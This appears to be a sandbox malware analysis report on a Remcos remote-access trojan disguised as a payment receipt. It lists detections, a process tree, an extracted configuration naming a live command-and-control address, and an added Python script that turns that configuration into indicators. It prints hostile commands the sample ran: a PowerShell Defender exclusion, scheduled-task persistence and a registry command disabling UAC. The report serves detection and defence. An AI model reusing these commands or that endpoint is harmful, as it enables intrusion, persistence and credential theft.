
Windows Analysis Report
SwiftCopy_PaymtRecpt121228.exe

Overview

General Information

Sample name: SwiftCopy_PaymtRecpt121228.exe
Analysis ID: 1576839
MD5: 1f0ae2753f131f73c2fe881c1c8e7c8f
SHA1: e3d9f0de991f7b91c04449a0a12cb398df6cbd21
SHA256: 695e10634e8981a0d110a120bade28b66b58c6400879b37257894d219c55048d
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • SwiftCopy_PaymtRecpt121228.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7732 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7540 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SwiftCopy_PaymtRecpt121228.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 5600 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 5672 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 3304 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
      • SwiftCopy_PaymtRecpt121228.exe (PID: 1812 cmdline: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
  • eaJOpx.exe (PID: 7832 cmdline: C:\Users\user\AppData\Roaming\eaJOpx.exe MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
    • schtasks.exe (PID: 7960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eaJOpx.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\eaJOpx.exe" MD5: 1F0AE2753F131F73C2FE881C1C8E7C8F)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.17:56887:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OPLFYE", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x15380:$a1: Remcos restarted by watchdog!
  • 0x158f8:$a3: %02i:%02i:%02i:%03i
(30 memory-dump matches in the full report; only the first are shown here)

Source | Rule | Description | Author | Strings
0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x69ef8:$a1: Remcos restarted by watchdog!
  • 0x6a470:$a3: %02i:%02i:%02i:%03i
0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64204:$str_b2: Executing file:
  • 0x6503c:$str_b3: GetDirectListeningPort
  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x64b80:$str_b7: \update.vbs
  • 0x6422c:$str_b9: Downloaded file:
  • 0x64218:$str_b10: Downloading file:
  • 0x642bc:$str_b12: Failed to upload file:
  • 0x65004:$str_b13: StartForward
  • 0x65024:$str_b14: StopForward
  • 0x64ad8:$str_b15: fso.DeleteFile "
  • 0x64a6c:$str_b16: On Error Resume Next
  • 0x64b08:$str_b17: fso.DeleteFolder "
  • 0x642ac:$str_b18: Uploaded file:
  • 0x6426c:$str_b19: Unable to delete:
  • 0x64aa0:$str_b20: while fso.FileExists("
  • 0x64749:$str_c0: [Firefox StoredLogins not found]
(51 unpacked-PE matches in the full report; only the first are shown here)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", ProcessId: 7520, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", ProcessId: 7520, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eaJOpx.exe, ParentImage: C:\Users\user\AppData\Roaming\eaJOpx.exe, ParentProcessId: 7832, ParentProcessName: eaJOpx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp", ProcessId: 7960, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", ProcessId: 7540, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe", ProcessId: 7520, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe", ParentImage: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ParentProcessId: 7252, ParentProcessName: SwiftCopy_PaymtRecpt121228.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp", ProcessId: 7540, ProcessName: schtasks.exe

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: A7 7F D2 A1 D6 82 9B D3 44 CF D8 38 92 28 07 DB AC 3B 4F 29 4C EC 17 E7 29 A6 A2 04 44 84 DC 94 1C 66 0B EE C3 DE 8E 8D AE 7B F2 67 67 E0 99 AF 7E 86 05 6F 69 71 F2 C9 87 DC FA DA 7A DB 45 17 A3 BC 41 CE A8 9D 29 FA 52 C9 32 F6 59 A2 24 EB 2A 2E BA D2 F5 79 8A A6 DA 3E 08 38 25 0B 31 78 3F 6D 7D 80 A5 F8 99 24 99 58 59 A3 CD 55, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe, ProcessId: 7664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-OPLFYE\exepath

Suricata alerts (C2 traffic)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T16:37:04.673904+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:39:56.158723+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49983 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:39:56.361838+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:02.502445+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49985 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:11.721264+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49986 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:11.940037+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49987 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:18.830725+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49988 | 192.210.150.17 | 56887 | TCP

Suricata alerts (other traffic)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T16:37:07.330710+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 178.237.33.50 | 80 | TCP
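The extracted Remcos configuration earlier on the page names the C2 endpoint (192.210.150.17:56887, password "1"), the mutex Rmc-OPLFYE, and the file and folder names the implant uses; the registry event above shows the per-install key HKCU\SOFTWARE\Rmc-OPLFYE, i.e. a key named after that mutex, and the Suricata tables show which flows went to the configured endpoint. The Python block below is an added example, not code from the report or from Joe Sandbox: it turns the configuration into a small IOC set and uses it to pick the C2 flows out of the alert rows, leaving the geoplugin.net lookup (178.237.33.50:80) unflagged. The configuration values and alert rows are copied from the page; the hostname entry used in the usage check is a hypothetical one to exercise the domain branch.

```python
import ipaddress

# Remcos configuration fields as extracted by the sandbox (copied from the
# report); keys the example does not use are left out.
REMCOS_CONFIG = {
    "Host:Port:Password": ["192.210.150.17:56887:1"],
    "Mutex": "Rmc-OPLFYE",
    "Copy file": "remcos.exe",
    "Copy folder": "Remcos",
    "Keylog file": "logs.dat",
    "Keylog folder": "remcos",
}

# Alert rows built by hand from the report's two Suricata tables (constructed
# tuples, not a Suricata EVE export). Field order:
# timestamp, SID, severity, classtype, src, sport, dst, dport, proto.
ALERTS = [
    ("2024-12-17T16:37:04.673904+0100", 2036594, 1, "Malware Command and Control Activity Detected",
     "192.168.2.5", 49706, "192.210.150.17", 56887, "TCP"),
    ("2024-12-17T16:37:07.330710+0100", 2803304, 3, "Unknown Traffic",
     "192.168.2.5", 49708, "178.237.33.50", 80, "TCP"),   # geoplugin.net lookup, not C2
    ("2024-12-17T16:39:56.158723+0100", 2036594, 1, "Malware Command and Control Activity Detected",
     "192.168.2.5", 49983, "192.210.150.17", 56887, "TCP"),
]


def parse_c2(entry: str) -> dict:
    """Split a Remcos 'host:port:password' entry. Only the first two colons
    separate fields, so a password that itself contains ':' survives intact."""
    host, port, password = entry.split(":", 2)
    return {"host": host, "port": int(port), "password": password}


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def config_to_iocs(cfg: dict) -> dict:
    """Turn the extracted configuration into host and network indicators."""
    c2s = [parse_c2(e) for e in cfg["Host:Port:Password"]]
    mutex = cfg["Mutex"]
    return {
        "c2": sorted({(c["host"], c["port"]) for c in c2s}),
        "c2_ips": sorted({c["host"] for c in c2s if is_ip(c["host"])}),
        "c2_domains": sorted({c["host"] for c in c2s if not is_ip(c["host"])}),
        "mutex": mutex,
        # Remcos keeps its per-install state under a HKCU key named after the
        # mutex; the report's registry event (...\Rmc-OPLFYE\exepath) is that key.
        "registry_key": rf"HKEY_CURRENT_USER\SOFTWARE\{mutex}",
        "file_names": sorted({cfg["Copy file"], cfg["Keylog file"]}),
        "folder_names": sorted({cfg["Copy folder"], cfg["Keylog folder"]}),
    }


def c2_alerts(alerts: list, iocs: dict) -> list:
    """Keep only alert rows whose destination is a configured C2 endpoint."""
    c2 = set(iocs["c2"])
    return [a for a in alerts if (a[6], a[7]) in c2]


if __name__ == "__main__":
    iocs = config_to_iocs(REMCOS_CONFIG)
    for key, value in iocs.items():
        print(f"{key}: {value}")
    for row in c2_alerts(ALERTS, iocs):
        print("C2 flow:", row[0], row[4], row[5], "->", row[6], row[7])
```

Matching on the (destination, port) pair from the configuration rather than on the JA3 signature alone is what separates the beaconing from the noisy geolocation lookup the implant performs at start-up; the registry key and mutex give the host-side pivots for the same infection.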


AV Detection

Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.17:56887:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OPLFYE", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | ReversingLabs: Detection: 34%
Source: SwiftCopy_PaymtRecpt121228.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Joe Sandbox ML: detected
Source: SwiftCopy_PaymtRecpt121228.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043294A
Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_fd48e109-7

Exploits

Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764
Source: SwiftCopy_PaymtRecpt121228.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SwiftCopy_PaymtRecpt121228.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: pUIh.pdbSHA256y` | source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr
